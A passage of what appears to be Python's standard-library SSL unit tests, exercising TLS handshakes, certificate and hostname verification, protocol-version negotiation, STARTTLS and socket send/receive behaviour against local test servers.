min_version = PROTOCOL_TO_TLS_VERSION.get(client_protocol, None)
if (min_version is not None
# SSLContext.minimum_version is only available on recent OpenSSL
# (setter added in OpenSSL 1.1.0, getter added in OpenSSL 1.1.1)
and hasattr(server_context, 'minimum_version')
and server_protocol == ssl.PROTOCOL_TLS
and server_context.minimum_version > min_version
):
# If OpenSSL configuration is strict and requires more recent TLS
# version, we have to change the minimum to test old TLS versions.
with warnings_helper.check_warnings():
server_context.minimum_version = min_version
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
seclevel_workaround(server_context, client_context)
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
@unittest.skipUnless(
ssl.HAS_NEVER_CHECK_COMMON_NAME, "test requires hostname_checks_common_name"
)
def test_hostname_checks_common_name(self):
client_context, server_context, hostname = testing_context()
assert client_context.hostname_checks_common_name
client_context.hostname_checks_common_name = False
# default cert has a SAN
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
client_context, server_context, hostname = testing_context(NOSANFILE)
client_context.hostname_checks_common_name = False
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLCertVerificationError):
s.connect((HOST, server.port))
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.options |= ssl.OP_NO_TLSv1_3
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@requires_tls_version('TLSv1_3')
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# TLS 1.3 perform client cert exchange after handshake
s.connect((HOST, server.port))
try:
s.write(b'data')
s.read(1000)
s.write(b'should have failed already')
s.read(1000)
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
if sys.platform == "win32":
self.skipTest(
"Ignoring failed test_wrong_cert_tls13 test case. "
"The test is flaky on Windows, see bpo-43921."
)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = socket_helper.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@requires_tls_version('SSLv2')
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if has_tls_version('SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@requires_tls_version('SSLv3')
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
@requires_tls_version('TLSv1')
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@requires_tls_version('TLSv1_1')
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
@requires_tls_version('TLSv1_2')
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(True)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.dup)
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, [bytearray(100)])
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
client_ctx, server_ctx, hostname = testing_context()
